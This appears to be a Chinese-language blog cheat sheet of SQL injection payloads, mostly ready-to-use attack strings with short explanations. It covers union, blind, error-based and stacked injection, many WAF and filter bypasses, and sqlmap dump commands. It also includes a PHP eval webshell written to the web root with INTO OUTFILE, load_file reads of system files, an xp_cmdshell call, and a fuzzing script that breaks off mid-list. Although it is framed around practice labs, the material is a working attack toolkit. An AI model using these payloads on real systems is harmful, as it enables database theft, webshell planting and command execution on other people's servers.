SQL注入payload

Created2021-12-01Updated2021-12-01

- SQL注入

SQL注入是比较常见的网络攻击方式之一，它不是利用操作系统的BUG来实现攻击，而是针对程序员编写时的疏忽，通过SQL语句，实现无账号登录，甚至篡改数据库。

攻击总体思路：

1：寻找到SQL注入的位置

2：判断服务器类型和后台数据库类型

3：针对不同的服务器和数据库特点进行SQL注入攻击

- -

- 0x00 SQL基本语法

MySQL开启远程连接 GRANT ALL PRIVILEGES ON *.* TO ‘用户名‘@’%’ IDENTIFIED BY ‘密码’ WITH GRANT OPTION;

- -

- 0 表的用途

MySQL

information_schema.schemata 存放所有数据库
    schema_name 数据库名称

information_schema.tables 存放所有数据库的表
    table_schema 数据库名称
    table_name 表名称
    
information_schema.columns 存放所有数据库的列
    table_schema 数据库名称
    table_name 表名称
    column_name 列名称

- - - - -

- 1 SELECT

SELECT * FROM 数据库.表

- -

- 2 INSERT

INSERT INTO table_name (column_list) VALUES (value_list);

- -

- 3 UPDATE

UPDATE subDomainDic SET type4domain=NULL,dic_target=0,domain_target=NULL WHERE dic_target=1;

- -

- 4 DELETE

DELETE FROM table_name WHERE predicate;

- -

- 5 基本函数

MySQL

mid
substr
group_concat
Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。

- - -

- 6 基本语句

显示版本：select version();
显示字符集：select @@character_set_database;
显示数据库show databases;
显示表名：show tables;
显示计算机名：select @@hostname;
显示系统版本：select @@version_compile_os;
显示mysql路径：select @@basedir;
显示数据库路径：select @@datadir;
显示root密码：select User,Password from mysql.user;
开启外连：GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

- - - - -

- x 中间件容器解析的区别

index.php?id=1&id=2
apache（php）解析最后一个参数，即显示id=2的内容。
Tomcat（jsp）解析第一个参数，即显示id=1的内容。

- -

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Web服务器	参数获取函数	获取到的参数
PHP/Apache	$_GET(“par”)	Last
JSP/Tomcat	Request.getParameter(“par”)	First
Perl(CGI)/Apache	Param(“par”)	First
Python/Apache	getvalue(“par”)	All(list)
ASP/IIS	Request.QuertString(“par”)	All(comma-delimited string)

- -

- 不同数据库的注入判断

# Oracle
'+UNION+SELECT+'abc','def'+FROM+dual--
# 显示数据库版本： 
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--


# MSSQL
'+UNION+SELECT+'abc','def'#
'UNION+SELECT+@@version,+NULL--+a
# 检索数据库中的表列表： '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

- - - - - - -

- 0x01 SQL注入基础

- -

- 1 常规注入

爆数据库

1	?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--

- -

爆数据表

1	?id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

- -

爆数据列

1	?id=1') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

- -

爆数据

1	?id=1') and 1=2 union select 1,group_concat(username),group_concat(password) from security.users--+

- -

查看是否具有读取权限

1 2	# 如果结果返回正常,说明具有读写权限。 select (select count(*) from mysql.user)>0;

- -

读文件

Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)))

利用hex()将文件内容导出来，尤其是smb文件时可以使用。
-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
Explain：“char(99,58,47,98,111,111,116,46,105,110,105)”就是“c:/boot.ini”的ASCII代码
-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
Explain：“c:/boot.ini”的16进制是“0x633a2f626f6f742e696e69”
-1 union select 1,1,1,load_file(c:\\boot.ini)
Explain:路径里的/用\\代替

- -

文件导入

1	?id=1')) UNION SELECT 1,2,'<?php@eval($_post[“mima”])?>' into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+

- - - - -

- 3 基于时间的盲注

if判断

# if表达式 如果a表达式为真，则执行b表达式，为假则执行c表达式
if(a, b, c)
?id=2' or if(1,sleep(2),1)--+

and (SELECT 7621 FROM (SELECT(SLEEP(5)))fjCb)--+
and (SELECT * FROM (SELECT(if(1,sleep(5),1)))aaa)#
AND (SELECT 7684 FROM (SELECT(SLEEP(5)))mRcs)

- -

利用sleep函数进行注入

1 2	# 若为假则延时五秒 ?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

- -

利用BENCHMARK()进行延时注入

1
2

# 当结果正确的时候，运行ENCODE('MSG','by5seconds')操作50000000次，会占用一段时间。
?id=1'UNION SELECT(IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM(select database() as current)as tb1--+

- - - - -

- 4 基于布尔的盲注

# rand()布尔判断
rand(true), rand(false)
?sort=rand(ascii(left(database(),1))=115)

###
select rand(ascii(left(database(),1))=115);
+-------------------------------------+
| rand(ascii(left(database(),1))=115) |
+-------------------------------------+
|                 0.40540353712197724 |
+-------------------------------------+
select rand(true);
+---------------------+
| rand(true)          |
+---------------------+
| 0.40540353712197724 |
+---------------------+

# buer
id=(SELECT (CASE WHEN (9647=9647) THEN 14 ELSE (SELECT 6297 UNION SELECT 2981) END))

- -

判断数据库版本第一位

1	?id=1' and left(version(),1)=5--+

- -

判断数据库长度

1	?id=1' and length(database())=8--+

- -

判断数据库第一位

1	?id=1' and left(database(),1)>'a';--+

- -

判断数据库第一位ascii

1	?id=1' and ascii(left(database(),1))>100--+

- -

布尔盲注获取数据表信息

1
2
3

substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)
# limit 0,1限制显示第一个表 substr限制数据结果的位数显示
# 可组合其他函数使用，如ascii

- - - - -

- 5 报错注入

xpath函数报错

# extractvalue
?id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+
# updatexml
?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+

- - - -

1
2
3

AND GTID_SUBSET(CONCAT(0x717a6a7071,(SELECT (ELT(2101=2101,1))),0x71716a6b71),2101)--

(SELECT 0x526e5452 WHERE 8019=8019 AND GTID_SUBSET(CONCAT(0x7171787671,(SELECT (ELT(5727=5727,1))),0x716b7a7171),5727))

- - - -

# 数据库数量
admin' AND GTID_SUBSET(CONCAT(0x716b7a7071,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8132)-- gqgS

# CAST 转换数据类型
CAST(COUNT(schema_name) AS NCHAR)
将COUNT(schema_name)转换为NCHAR型

- - - -

floor(rand(0)*2)

?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+

?sort=1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+

- -

double数值类型超出范围进行报错注入

1	?id=1' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+

- -

bigint溢出

1	?id=1' union select (!(select * from (select user())x) - ~0),2,3--+

- -

利用数据的重复性

1	?id=1' union select 1,2,3 from(select NAME_CONST(version(),1),NAME_CONST(version(),1))x--+

- - -

- 6 宽字节注入

mysql在使用GBK编码的时候，会认为两个字符为一个汉字，例如%aa%5c就是一个汉字（前一个ascii码大于128才能到汉字的范围）。我们在过滤’的时候，往往利用的思路是将‘转换为\’（转换的函数或者思路会在每一关遇到的时候介绍）。
因此我们在此想办法将‘前面添加的\除掉，一般有两种思路：
1、%df吃掉\具体的原因是urlencode(‘\)=%5c%27，我们在%5c%27前面添加%df，形成%df%5c%27，而上面提到的mysql在GBK编码方式的时候会将两个字节当做一个汉字，此事%df%5c就是一个汉字，%27则作为一个单独的符号在外面，同时也就达到了我们的目的。
2、将\’中的\过滤掉，例如可以构造%**%5c%5c%27的情况，后面的%5c会被前面的%5c给注释掉。这也是bypass的一种方法。

- -

此处过滤使用函数addslashes()
addslashes()函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符是：
单引号（'）
双引号（"）
反斜杠（\）
提示：该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。Addslashes()函数和我们在32关实现的功能基本一致的，所以我们依旧可以利用%df进行绕
过。
Notice：使用addslashes(),我们需要将mysql_query设置为binary的方式，才能防御此漏洞。Mysql_query(“SET character_set_connection=gbk,character_set_result=gbk,character_set_client=binary”,$conn);

- - - - - -

1 2	# sqlmap跑法 sqlmap -u "http://192.168.18.12/sqlilab/Less-32/?id=1" --batch --risk=3 --level=3 --random-agent - -dbs -v 3 --tamper unmagicquotes

- - -

- 7 堆叠注入

适用：MySQL, SQLServer, PostgreSQL

不适用：Oracle

1 原理
在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在;结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而unioninjection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union或者unionall执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。
Select * from products where productid=1;DELETE FROM products

2 堆叠注入的局限性
堆叠注入的局限性在于并不是每一个环境下都可以执行，可能受到API或者数据库引擎不支持的限制，当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。

- -

mysql

# 新建一个表
select * from users where id=1;create table test like users;
show tabkes;
# 删除上面新建的test表
select * from users where id=1;drop table test;
# 查询数据
select * from users where id=1;select 1,2,3;
# 加载文件
select * from users where id=1;select load_file('c:/tmpupbbn.php');
# 修改数据
select * from users where id=1;insert into users(id,username,password) values('100','new','new');

- - - -

sqlserver

# 增加数据表
select * from test;create table sc3(ss CHAR(8));
# 删除数据表
select * from test;drop table sc3;
# 查询数据
select 1,2,3;select * from test;
# 修改数据
select * from test;update test set name='test' where id=3;
# 存储过程的执行
select * from test where id=1;exec master..xp_cmdshell 'ipconfig'

- -

PostgreSQL

# 增加数据表
select * from user_test;create table user_data(id DATE);
select * from user_data;
# 删除新建的user_data表
select * from user_test;delete from user_data;
# 查询数据
select * from user_test;select 1,2,3;
# 修改数据
select * from user_test;update user_test set name='modify' where name='张三';

- - -

- 8 创建/上传文件

1 2	# 创建文件内容为 <?phpphpinfo();?> 16进制 ?sort=1'into outfile "c:\\wamp\\www\\sqllib\\test.php"lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+

- - - - -

- 9 搜索型注入

原理：

1	$sql="select * from user where password like '%$pwd%' order by password";

- -

这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password，正常用户当然会输入例如admin,ckse等等。但是如果有人输入这样的内容呢？

1	'and 1=1 and '%'='

- -

这样的话这句SQL语句就变成了这样：

1	select * from user where password like '%fendo'and 1=1 and '%'='%' order by password

- -

搜索型注入判断

1 搜索keywords‘，如果出错的话，有90%的可能性存在漏洞；

2 搜索 keywords%，如果同样出错的话，就有95%的可能性存在漏洞；

3 搜索keywords% ‘and 1=1 and ‘%’=’（这个语句的功能就相当于普通SQL注入的 and 1=1）看返回的情况

4 搜索keywords% ‘and 1=2 and ‘%’=’（这个语句的功能就相当于普通SQL注入的 and 1=2）看返回的情况

5 根据两次的返回情况来判断是不是搜索型文本框注入了

下面这几种语句都可以:

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='

- -

实战

1)get型注入

测试源码：

<?
   $pwd=$_GET['pwd'];
   $conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库
   if($conn){
   	echo "连接数据库成功!"; 
   }//判断连接是否成功
   echo "<br>";
   mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库（fendo）
   $sql="select * from user where password like '%$pwd%' order by password"; //字符型搜索语句
   $result=mysql_query($sql);
   while($row = mysql_fetch_array($result)){ 
   	echo "用户ID：".$row['id']."<br >";
   	echo "用户名：".$row['username']."<br >";
   	echo "用户密码：".$row['password']."<br >";
   	echo "用户邮箱：".$row['email']."<br >";
   }
   mysql_close($conn); //关闭数据库连接
   echo "<hr>";
   echo "你当前执行的sql语句为："."<br >";
   echo $sql;
   ?>

- -

1、判断字段数

1	%' union select 1,2,3,4,...... and '%'='

- -

还有种方法
语句:

1	%' and exists (select id from user where LENGTH(username)<6 and id=1) and '%'='

- - -

把6这个数字逐次更换,直到他不报错为止。如下当它小于6时正确,说明字段数为5。

2、判断表名

语句:

1	%'and(select count(*)from admin)>0 and '%'='

- -

把admin这个表名逐次更换,直到他不报错为止,就说明这个表存在。

3、猜解密码

2)post型注入

测试源码：

<?  

//--------------------------post处理--------------------------------//  

$name=addslashes($_POST['n']);   

$pass=addslashes($_POST['p']);  

$conn = mysql_connect('127.0.0.1','root','123');   

if($conn){  

    echo "mysql连接成功";  

    echo "<hr>";    

}  

mysql_select_db('fendo',$conn);    

$sql="select * from user where username='$name' and password='$pass'";  

$result=mysql_query($sql);  

mysql_close($conn);  

while($row = mysql_fetch_array($result)){  

    echo "用户ID：".$row['id']."<br >";  

    echo "用户名：".$row['username']."<br >";  

    echo "用户密码：".$row['password']."<br >";  

}  

echo "当前执行的sql语句：".$sql;  

?>  

 

<form action="" method="POST">  

账号：<input name="n" type="text" /><br><br>  

密码：<input name="p" type="text" /><br><br>  

<input name="" type="submit" value="提交" />  

 

</form>

- -

1、判断是否存在SQL注入

用PHP万能密码进行测试

' or 1=1#

- - -

在用户名里输入万能密码如果没报错,就说明存在SQL注入。

2、猜字段数

1	' order by 4#

- - -

逐次更改数字去猜,直到不报错为止。

3、猜表名

1	'or 1=1 union select 1,2,3,4 #

- - -

逐次累加数字,直到不报错为止。

4.猜内容

替换1,2,3为你想要获得的内容

1	'or 1=1 union select username,password,3,4 from user#

- - - - -

- 10 insert/update型注入点

# 布尔注入
Parameter: sex (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: sex=a' RLIKE (SELECT (CASE WHEN (5274=5274) THEN 0x61 ELSE 0x28 END))-- sQlU&phonenum=a&add=a&email=a&submit=submit
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    
# 报错注入
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: sex=a' AND EXTRACTVALUE(3124,CONCAT(0x5c,0x716b767a71,(SELECT (ELT(3124=3124,1))),0x7162626a71))-- bRMD&phonenum=a&add=a&email=a&submit=submit
    Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
    
# 延时注入
    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)
    Payload: sex=a' RLIKE (SELECT 6187 FROM (SELECT(SLEEP(5)))jLem)-- yIsA&phonenum=a&add=a&email=a&submit=submit
    Vector: RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

- - - - - - -

- *sqlmap用法

获取数据库信息

1	sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 --dbs

- -

获取数据表信息

1	sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security --tables

- -

获取列信息

1	sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security -T em ails --columns

- -

读取数据

1	sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security -T us ers --C id,username,password --dump

- - - -

1 2	# http头注入 sqlmap.py -u “url” --host * --thread=1 --batch -v 1 --delay=0.7 --dbms mysql --current-db --current-user --dbs

- - - - - - -

- 0x02 绕过及过滤闭合

- -

- 1、绕过

- -

- 1 注释符绕过

常用注释符：

//,
-- ,
/**/,
#,
--+,
-- -,
;,%00,
--aUNION /**/ Select /**/user，pwd，from userU/**/ NION /**/ SE/**/ LECT /**/user，pwd from user

- -

绕过注释符号（#，–）过滤：

id=1'union select 1,2,3||'1

最后的or '1闭合查询语句的最后的单引号，或者：

id=1'union select 1,2,'3

- - - - -

- 2 or and 绕过

and=&& or=||
（1）大小写变形Or,OR,oR
（2）编码，hex，urlencode
（3）添加注释/*or*/
（4）利用符号and=&&or=||

- - - - -

- 2 大小写绕过

1	?id=1+UnIoN/**/SeLeCT

- - -

- 3 内联注释绕过

1	id=1/!UnIoN/+SeLeCT+1,2,concat(/!table_name/)+FrOM /information_schema/.tables /!WHERE /+/!TaBlE_ScHeMa/+like+database()-- -

- -

通常情况下，上面的代码可以绕过过滤器，请注意，我们用的是 Like而不是 =

- -

- 4 双关键字绕过

1	?id=1+UNIunionON+SeLselectECT+1,2,3–

- - -

- 5 编码绕过

如URLEncode编码，ASCII,HEX,unicode编码绕过

or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

十六进制编码SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))双重编码绕过

select load_file('0x2f6574632f706173737764');
python
>>> '/etc/passwd'.encode('hex')
'2f6574632f706173737764'

?id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+

一些unicode编码举例：  

单引号：'%u0027 %u02b9 %u02bc%u02c8 %u2032%uff07 %c0%27%c0%a7 %e0%80%a7

空白：%u0020 %uff00%c0%20 %c0%a0 %e0%80%a0

左括号(:%u0028 %uff08%c0%28 %c0%a8%e0%80%a8

右括号):%u0029 %uff09%c0%29 %c0%a9%e0%80%a9

- -

十六进制引号绕过

users的十六进制的字符串是7573657273。那么最后的sql语句就变为了：

1	selectcolumn_namefrominformation_schema.tableswheretable_name=0x7573657273

- - - - -

- 6 空格绕过

两个空格代替一个空格，用Tab代替空格

%20 +
%09 tab键（水平）
%0a 新建一行
%0b tab键（垂直）
%0c 新建一页
%0d return功能
%a0 空格
/**/

- -

括号绕过空格在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。

1	select(user())from dual where 1=1 and 2=2;

- - - - -

- 7 逗号绕过

在使用盲注的时候，需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决：

select substr(database() from 1 for 1); # for 1显示1个字符 from 1从第一个开始显示
select mid(database() from 1 for 1);

对于limit可以使用offset来绕过：

select * from news limit 0,1# 等价于下面这条SQL语句
select * from news limit 1 offset 0

# case when then
1 mysql> select case when 1=1 then sleep(2) else 0 end;
2 +----------------------------------------+
3 | case when 1=1 then sleep(2) else 0 end |
4 +----------------------------------------+
5 | 0                                      |
6 +----------------------------------------+
7 row in set (2.00 sec)

# join
union select 1,2,3,4;
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);

- - -

- 8 比较符号-尖括号过滤绕过<>

同样是在使用盲注的时候，在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用到greatest来进行绕过了。

最常见的一个盲注的sql语句：

select * from users where id=1 and ascii(substr(database(),0,1))>64

此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,...)函数返回输入参数(n1,n2,n3,...)的最大值。

那么上面的这条sql语句可以使用greatest变为如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

- - -

- 9 =绕过

like绕过 =

1 2	?id=1' or 1 like 1 绕过对“=”，“>”等的过滤

- - -

- 10 union，select，where等绕过

（1）使用注释符绕过：

常用注释符：

//，-- , /**/, #, --+, -- -, ;,%00,--a

用法：

U/**/NION/**/SE/**/LECT/**/user，pwd from user

（2）使用大小写绕过：

id=-1'UnIoN/**/SeLeCT

（3）内联注释绕过：

id=-1'/*!UnIoN*/SeLeCT1,2,concat(/*!table_name*/) FrOM/*information_schema*/.tables/*!WHERE*//*!TaBlE_ScHeMa*/like database()#

## （4） 双关键字绕过：

id=-1'UNIunionONSeLselectECT1,2,3–-

- - - - -

- 10.通用绕过（编码）：

如URLEncode编码，ASCII,HEX,unicode编码绕过：

or1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

- -

- 11 等价函数绕过

hex()、bin()==>ascii()

sleep()==>benchmark()

concat_ws()==>group_concat()

mid()、substr()==>substring() @@user==>user() @@datadir==>datadir()

举例：substring()和substr()无法使用时：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74或者：

substr((select'password'),1,1)=0x70strcmp(left('password',1),0x69)=1strcmp(left('password',1),0x70)=0strcmp(left('password',1),0x71)=-1

- - -

- 12 宽字节绕过

过滤单引号时，可以试试宽字节
%bf%27 %df%27 %aa%27


过滤 ' 的时候往往利用的思路是将 ' 转换为 \' 。
在 mysql 中使用 GBK 编码的时候，会认为两个字符为一个汉字，一般有两种思路：

（1）%df 吃掉 \ 具体的方法是 urlencode('\) = %5c%27，我们在 %5c%27 前面添加 %df ，形成 %df%5c%27 ，而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字，%df%5c 就是一个汉字，%27 作为一个单独的（'）符号在外面：
id=-1%df%27union select 1,user(),3--+

（2）将 \' 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27 ，后面的 %5c 会被前面的 %5c 注释掉。
一般产生宽字节注入的PHP函数：
1.replace（）：过滤 ' \ ，将 ' 转化为 \' ，将 \  转为 \\，将 " 转为 \" 。用思路一。
2.addslaches()：返回在预定义字符之前添加反斜杠（\）的字符串。预定义字符：' , " , \ 。用思路一
（防御此漏洞，要将 mysql_query 设置为 binary 的方式）

3.mysql_real_escape_string()：转义下列字符：
\x00    \n    \r    \'"    \x1a
（防御，将mysql设置为gbk即可）

- - - - - - -

- * 万能密钥绕过

1	用经典的or 1=1判断绕过,如or ‘swords’ =’swords

- - -

- 8 +,-,.号拆解字符串绕过

1 2	?id=1' or '11+11'='11+11' "-"和"."

- - - - -

- 10 in绕过

1	or '1' IN ('swords')

- - -

- 11 >,

1 2	or 'password' > 'pass' or 1<3

- - -

- 12 等价函数与命令绕过

1.函数或变量

hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()

举例：substring()和substr()无法使用时：
?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74　
或者：
substr((select 'password'),1,1) = 0x70strcmp(left('password',1), 0x69) = 1strcmp(left('password',1), 0x70) = 0strcmp(left('password',1), 0x71) = -1

- -

2.符号

1	and和or有可能不能使用，可以试下&&和\|\|=不能使用的情况，可以考虑尝试

- -

3.生僻函数

MySQL/PostgreSQL支持XML函数：
Select UpdateXML(‘ ’,’/script/@x/’,’src=//evil.com’);　　　　　　　　　　
?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))

SELECT xmlelement(name img,xmlattributes(1as src,'a\l\x65rt(1)'as \117n\x65rror));　//postgresql

?id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1))and extractvalue(1, concat(0x5c, (select user()),0x5c))

- - -

- 13 反引号`绕过

1	select `version()`，可以用来过空格和正则，特殊情况下还可以将其做注释符用

- - -

- 14 换行符绕过

%0a、%0d

- - -

- 15 截断绕过

1
2
3

%00,%0A,?,/0,........,%80-%99
目录字符串，在window下256字节、linux下4096字节时会达到最大值，最大值长度之后的字符将被丢弃。
././././././././././././././././abcabc..1/abc/../1/abc/../1/abc

- - - - -

- 17 \N绕过

\N其实相当于NULL字符

select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0

- - -

- 18 特殊的绕过函数

1. 通过greatest函数绕过不能使用大小于符号的情况
greatest(a,b)，返回a和b中较大的那个数。当我们要猜解user()第一个字符的ascii码是否小于等于150时，可使用：
mysql> select greatest(ascii(mid(user(),1,1)),150)=150; 
+------------------------------------------+
| greatest(ascii(mid(user(),1,1)),150)=150 | 
+------------------------------------------+
|                                        1 | 
+------------------------------------------+
如果小于150，则上述返回值为True。

2. 通过substr函数绕过不能使用逗号的情况
mid(user() from 1 for 1)或substr(user() from 1 for 1)
mysql> select ascii(substr(user() from 1 for 1)) < 150; 
+------------------------------------------+
| ascii(substr(user() from 1 for 1)) < 150 | 
+------------------------------------------+
|                                        1 | 
+------------------------------------------+

3.使用数学运算函数在子查询中报错
exp(x)函数的作用： 取常数e的x次方，其中，e是自然对数的底。
~x 是一个一元运算符，将x按位取补

select exp(~(select*from(select user())a))mysql报错：
mysql> select exp(~(select*from(select user())a));
ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’
这条查询会出错，是因为exp(x)的参数x过大，超过了数值范围，分解到子查询，就是：(select*from(select user())a) 
得到字符串 root@localhost表达式’root@localhost’被转换为0，按位取补之后得到一个非常的大数，它是MySQL中最大的无符号整数

- - - - -

- mysql黑魔法绕过

select{x user}from {x mysql.user};

select user from mysql.user where 1=\Nunion select@1;

select user from mysql.user where 1=\Nunion select-.1;

select~2.1from xxxx

select-2.1from xxx

select~2e1from xxx

1	if((select%0b(select(xxx)``from(xxx))regexp(0x5e61)),(`sleep`(5)),0)

- - - - - - -

- 2、过滤闭合

- -

- 1 过滤关键字

1 过滤关键字   and or

    php代码   preg_match('/(and|or)/i',$id)

    会过滤的攻击代码    1 or 1=1 1 and 1=1

    绕过方式    1 || 1=1 1 && 1=1

2 过滤关键字   and or union

    php代码   preg_match('/(and|or|union)/i',$id)

    会过滤的攻击代码    union select user,password from users

    绕过方式    1 && (select user from users where userid=1)='admin'

3 过滤关键字   and or union where

    php代码   preg_match('/(and|or|union|where)/i',$id)

    会过滤的攻击代码    1 && (select user from users where user_id = 1) = 'admin'

    绕过方式    1 && (select user from users limit 1) = 'admin'

4 过滤关键字   and or union where

    php代码   preg_match('/(and|or|union|where)/i',$id)

    会过滤的攻击代码    1 && (select user from users where user_id = 1) = 'admin'

    绕过方式    1 && (select user from users limit 1) = 'admin'

5 过滤关键字   and, or, union, where, limit

    php代码   preg_match('/(and|or|union|where|limit)/i', $id)

    会过滤的攻击代码    1 && (select user from users limit 1) = 'admin'

    绕过方式    1 && (select user from users group by user_id having user_id = 1) = 'admin'#user_id聚合中user_id为1的user为admin

6 过滤关键字   and, or, union, where, limit, group by

    php代码   preg_match('/(and|or|union|where|limit|group by)/i', $id)

    会过滤的攻击代码    1 && (select user from users group by user_id having user_id = 1) = 'admin'

    绕过方式    1 && (select substr(group_concat(user_id),1,1) user from users ) = 1

7 过滤关键字   and, or, union, where, limit, group by, select

    php代码   preg_match('/(and|or|union|where|limit|group by|select)/i', $id)

    会过滤的攻击代码    1 && (select substr(gruop_concat(user_id),1,1) user from users) = 1

    绕过方式    1 && substr(user,1,1) = 'a'

8 过滤关键字   and, or, union, where, limit, group by, select, '

    php代码   preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)

    会过滤的攻击代码    1 && (select substr(gruop_concat(user_id),1,1) user from users) = 1

    绕过方式    1 && user_id is not null 1 && substr(user,1,1) = 0x61 1 && substr(user,1,1) = unhex(61)

9 过滤关键字   and, or, union, where, limit, group by, select, ', hex

    php代码   preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)

    会过滤的攻击代码    1 && substr(user,1,1) = unhex(61)

    绕过方式    1 &&substr(user,1,1) =lower(conv(11,10,16)) #十进制的11转化为十六进制，并小写。

10 过滤关键字and,or,union,where,limit,groupby,select,', hex, substr

    php代码   preg_match('/(and|or|union|where|limit|groupby|select|\'|hex|substr)/i', $id)

    会过滤的攻击代码    1 &&substr(user,1,1) =lower(conv(11,10,16))/td>

    绕过方式    1 &&lpad(user,7,1)

11 过滤关键字and,or,union,where,limit,groupby,select,', hex, substr, 空格

    php代码   preg_match('/(and|or|union|where|limit|groupby|select|\'|hex|substr|\s)/i', $id)

    会过滤的攻击代码    1 &&lpad(user,7,1)/td>

    绕过方式    1%0b||%0blpad(user,7,1)

12 过滤关键字andorunionwhere

    php代码   preg_match('/(and|or|union|where)/i',$id)

    会过滤的攻击代码    1 || (selectuserfromuserswhereuser_id = 1) ='admin'

    绕过方式    1 || (selectuserfromuserslimit1) ='admin'

- - - - -

- 0x03 FUZZ

- -

- 1 过滤字符的FUZZ

get

import requests

sql_char = ['select',
			'union',
			'and',
			'or',
			'sleep',
			'where',
			'from',
			'limit',
			'group',
			'by',
			'like',
			'prepare',
			'as',
			'if',
			'char',
			'ascii',
			'mid',
			'left',
			'right',
			'substring',
			'handler',
			'updatexml',
			'extractvalue',
			'benchmark',
			'insert',
			'update',
			'all',
			'@',
			'#',
			'^',
			'&',
			'*',
			'\'',
			'"',
			'~',
			'`',
			'(',
			')',
			'--',
			'=',
			'/',
			'\\',
			' ']

for char in sql_char:
	res = requests.get("http://127.0.0.1/get.php?query="+char+"&submit2=sbumit")
	if 'Illegal Char' in res.text:
		print("该字符是非法字符: {0}".format(char))
	else:
		print("通过: {0}".format(char))

- -

post

import requests

sql_char = ['select',
			'union',
			'and',
			'or',
			'sleep',
			'where',
			'from',
			'limit',
			'group',
			'by',
			'like',
			'prepare',
			'as',
			'if',
